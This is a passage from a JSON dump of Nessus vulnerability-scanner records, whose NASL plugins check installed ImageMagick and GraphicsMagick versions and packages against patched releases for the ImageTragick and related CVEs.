A remote attacker can exploit this, via an MVG file with a specially crafted fill element, to bypass access restrictions and conduct host-based attacks.\n (CVE-2016-3718)", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-04T00:00:00", "type": "nessus", "title": "ImageMagick < 7.0.1-1 / 6.x < 6.9.3-10 Multiple Vulnerabilities (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:imagemagick:imagemagick"], "id": "IMAGEMAGICK_7_0_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/90892", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90892);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2016-3714\",\n \"CVE-2016-3715\",\n \"CVE-2016-3716\",\n \"CVE-2016-3717\",\n \"CVE-2016-3718\"\n );\n script_bugtraq_id(\n 89848,\n 89849,\n 89852,\n 89861,\n 89866\n );\n script_xref(name:\"CERT\", value:\"250519\");\n script_xref(name:\"EDB-ID\", value:\"39767\");\n script_xref(name:\"EDB-ID\", value:\"39791\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"ImageMagick < 7.0.1-1 / 6.x < 6.9.3-10 Multiple Vulnerabilities (ImageTragick)\");\n script_summary(english:\"Checks the version of ImageMagick.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application installed that is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host has a version of ImageMagick installed that is\nprior to 7.0.1-1 or 6.x prior to 6.9.3-10. 
It is, therefore, affected\nby the following vulnerabilities :\n\n - A remote code execution vulnerability, known as\n ImageTragick, exists due to a failure to properly filter\n shell characters in filenames passed to delegate\n commands. A remote attacker can exploit this, via\n specially crafted images, to inject shell commands and\n execute arbitrary code. (CVE-2016-3714)\n\n - An unspecified flaw exists in the 'ephemeral' pseudo\n protocol that allows an attacker to delete arbitrary\n files. (CVE-2016-3715)\n\n - An unspecified flaw exists in the 'msl' pseudo protocol\n that allows an attacker to move arbitrary files to\n arbitrary locations. (CVE-2016-3716)\n\n - An unspecified flaw exists in the 'label' pseudo\n protocol that allows an attacker, via a specially\n crafted image, to read arbitrary files. (CVE-2016-3717)\n\n - A server-side request forgery (SSRF) vulnerability\n exists due to an unspecified flaw related to request\n handling between a user and the server. A remote\n attacker can exploit this, via an MVG file with a\n specially crafted fill element, to bypass access\n restrictions and conduct host-based attacks.\n (CVE-2016-3718)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.imagemagick.org/script/changelog.php\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588\");\n script_set_attribute(attribute:\"see_also\", value:\"https://imagetragick.com/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ImageMagick version 7.0.1-1 / 6.9.3-10 or later.\n\nNote that you may need to manually uninstall the vulnerable version\nfrom the system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n
script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3714\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:imagemagick:imagemagick\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"imagemagick_installed.nasl\");\n script_require_keys(\"installed_sw/ImageMagick\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ImageMagick\";\n\n# Get installs\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\ndisplay_version = install['display_version'];\nversion = install['version'];\nbuild = install['build'];\npath = install['path'];\n\nvuln = FALSE;\n\nif (version =~ \"^6\\.\")\n{\n fix = \"6.9.3\";\n fix_build = 10;\n}\nelse if (version =~ \"^7\\.\")\n{\n fix = \"7.0.1\";\n fix_build = 1;\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, display_version, path);\n\ndisplay_fix = fix + \"-\" + fix_build;\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n vuln = TRUE;\n\nif ((ver_compare(ver:version, fix:fix, strict:FALSE) == 0) &&\n build < fix_build\n )\n vuln = TRUE;\n\nif (vuln)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n items = make_array(\"Installed version\", display_version,\n \"Fixed version\", display_fix,\n \"Path\", path\n );\n\n order = make_list(\"Path\", \"Installed version\", \"Fixed version\");\n report = report_items_str(report_items:items, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n exit(0);\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app, display_version, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:58:22", "description": "Nikolay Ermishkin and Stewie discovered that ImageMagick incorrectly sanitized untrusted input. A remote attacker could use these issues to execute arbitrary code. These issues are known as 'ImageTragick'. This update disables problematic coders via the /etc/ImageMagick-6/policy.xml configuration file. 
In certain environments the coders may need to be manually re-enabled after making sure that ImageMagick does not process untrusted input.\n(CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717, CVE-2016-3718)\n\nBob Friesenhahn discovered that ImageMagick allowed injecting commands via an image file or filename. A remote attacker could use this issue to execute arbitrary code. (CVE-2016-5118).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-03T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 15.10 / 16.04 LTS : imagemagick vulnerabilities (USN-2990-1) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5118"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:imagemagick", "p-cpe:/a:canonical:ubuntu_linux:imagemagick-6.q16", "p-cpe:/a:canonical:ubuntu_linux:imagemagick-common", "p-cpe:/a:canonical:ubuntu_linux:libmagick%2b%2b-6.q16-5v5", "p-cpe:/a:canonical:ubuntu_linux:libmagick%2b%2b4", "p-cpe:/a:canonical:ubuntu_linux:libmagick%2b%2b5", "p-cpe:/a:canonical:ubuntu_linux:libmagickcore-6.q16-2", "p-cpe:/a:canonical:ubuntu_linux:libmagickcore4", "p-cpe:/a:canonical:ubuntu_linux:libmagickcore5", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-2990-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91450", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice 
USN-2990-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91450);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\", \"CVE-2016-5118\");\n script_xref(name:\"USN\", value:\"2990-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 15.10 / 16.04 LTS : imagemagick vulnerabilities (USN-2990-1) (ImageTragick)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Nikolay Ermishkin and Stewie discovered that ImageMagick incorrectly\nsanitized untrusted input. A remote attacker could use these issues to\nexecute arbitrary code. These issues are known as 'ImageTragick'. This\nupdate disables problematic coders via the\n/etc/ImageMagick-6/policy.xml configuration file. In certain\nenvironments the coders may need to be manually re-enabled after\nmaking sure that ImageMagick does not process untrusted input.\n(CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, CVE-2016-3717,\nCVE-2016-3718)\n\nBob Friesenhahn discovered that ImageMagick allowed injecting commands\nvia an image file or filename. A remote attacker could use this issue\nto execute arbitrary code. (CVE-2016-5118).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2990-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:imagemagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:imagemagick-6.q16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:imagemagick-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagick++-6.q16-5v5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagick++4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagick++5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore-6.q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmagickcore5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/03\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2021 Canonical, Inc. / NASL script (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|15\\.10|16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 15.10 / 16.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"imagemagick\", pkgver:\"8:6.6.9.7-5ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"imagemagick-common\", pkgver:\"8:6.6.9.7-5ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libmagick++4\", pkgver:\"8:6.6.9.7-5ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libmagickcore4\", pkgver:\"8:6.6.9.7-5ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"imagemagick\", pkgver:\"8:6.7.7.10-6ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"imagemagick-common\", pkgver:\"8:6.7.7.10-6ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libmagick++5\", pkgver:\"8:6.7.7.10-6ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libmagickcore5\", pkgver:\"8:6.7.7.10-6ubuntu3.1\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"imagemagick\", pkgver:\"8:6.8.9.9-5ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"imagemagick-6.q16\", pkgver:\"8:6.8.9.9-5ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"imagemagick-common\", pkgver:\"8:6.8.9.9-5ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"libmagick++-6.q16-5v5\", pkgver:\"8:6.8.9.9-5ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"libmagickcore-6.q16-2\", pkgver:\"8:6.8.9.9-5ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"imagemagick\", pkgver:\"8:6.8.9.9-7ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"imagemagick-6.q16\", pkgver:\"8:6.8.9.9-7ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"imagemagick-common\", pkgver:\"8:6.8.9.9-7ubuntu5.1\")) flag++;\nif 
(ubuntu_check(osver:\"16.04\", pkgname:\"libmagick++-6.q16-5v5\", pkgver:\"8:6.8.9.9-7ubuntu5.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libmagickcore-6.q16-2\", pkgver:\"8:6.8.9.9-7ubuntu5.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"imagemagick / imagemagick-6.q16 / imagemagick-common / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:47:24", "description": "http://www.graphicsmagick.org/NEWS.html#june-15-2019\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-07-01T00:00:00", "type": "nessus", "title": "Fedora 29 : GraphicsMagick (2019-425a1aa7c9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11638", "CVE-2017-11642", "CVE-2017-11722", "CVE-2017-12805", "CVE-2017-12806", "CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13648", "CVE-2017-13736", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-14504", "CVE-2017-14649", "CVE-2017-14733", "CVE-2017-14994", "CVE-2017-14997", "CVE-2017-15238", "CVE-2017-15930", "CVE-2017-16545", "CVE-2017-16547", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-18219", "CVE-2017-18220", "CVE-2018-6799", "CVE-2019-11470", "CVE-2019-11472", "CVE-2019-11473", "CVE-2019-11474"], "modified": "2020-01-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:GraphicsMagick", 
"cpe:/o:fedoraproject:fedora:29"], "id": "FEDORA_2019-425A1AA7C9.NASL", "href": "https://www.tenable.com/plugins/nessus/126356", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-425a1aa7c9.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126356);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/08\");\n\n script_cve_id(\"CVE-2017-11638\", \"CVE-2017-11642\", \"CVE-2017-11722\", \"CVE-2017-12805\", \"CVE-2017-12806\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13648\", \"CVE-2017-13736\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-14504\", \"CVE-2017-14649\", \"CVE-2017-14733\", \"CVE-2017-14994\", \"CVE-2017-14997\", \"CVE-2017-15238\", \"CVE-2017-15930\", \"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-18219\", \"CVE-2017-18220\", \"CVE-2018-6799\", \"CVE-2019-11470\", \"CVE-2019-11472\", \"CVE-2019-11473\", \"CVE-2019-11474\");\n script_xref(name:\"FEDORA\", value:\"2019-425a1aa7c9\");\n\n script_name(english:\"Fedora 29 : GraphicsMagick (2019-425a1aa7c9)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"http://www.graphicsmagick.org/NEWS.html#june-15-2019\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://www.graphicsmagick.org/NEWS.html#june-15-2019\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-425a1aa7c9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-6799\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"GraphicsMagick-1.3.32-1.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:45:56", "description": "New bug and security fix release, see http://www.graphicsmagick.org/NEWS.html#june-15-2019\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, 
"vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-07-01T00:00:00", "type": "nessus", "title": "Fedora 30 : GraphicsMagick (2019-da4c20882c)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11638", "CVE-2017-11642", "CVE-2017-11722", "CVE-2017-12805", "CVE-2017-12806", "CVE-2017-12935", "CVE-2017-12936", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13648", "CVE-2017-13736", "CVE-2017-13737", "CVE-2017-13775", "CVE-2017-14504", "CVE-2017-14649", "CVE-2017-14733", "CVE-2017-14994", "CVE-2017-14997", "CVE-2017-15238", "CVE-2017-15930", "CVE-2017-16545", "CVE-2017-16547", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-18219", "CVE-2017-18220", "CVE-2018-6799", "CVE-2019-11470", "CVE-2019-11472", "CVE-2019-11473", "CVE-2019-11474"], "modified": "2020-01-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:GraphicsMagick", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2019-DA4C20882C.NASL", "href": "https://www.tenable.com/plugins/nessus/126361", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-da4c20882c.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126361);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/08\");\n\n script_cve_id(\"CVE-2017-11638\", \"CVE-2017-11642\", \"CVE-2017-11722\", \"CVE-2017-12805\", \"CVE-2017-12806\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13648\", \"CVE-2017-13736\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-14504\", \"CVE-2017-14649\", \"CVE-2017-14733\", \"CVE-2017-14994\", \"CVE-2017-14997\", \"CVE-2017-15238\", \"CVE-2017-15930\", \"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", 
\"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-18219\", \"CVE-2017-18220\", \"CVE-2018-6799\", \"CVE-2019-11470\", \"CVE-2019-11472\", \"CVE-2019-11473\", \"CVE-2019-11474\");\n script_xref(name:\"FEDORA\", value:\"2019-da4c20882c\");\n\n script_name(english:\"Fedora 30 : GraphicsMagick (2019-da4c20882c)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bug and security fix release, see\nhttp://www.graphicsmagick.org/NEWS.html#june-15-2019\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.graphicsmagick.org/NEWS.html#june-15-2019\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-da4c20882c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-6799\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", 
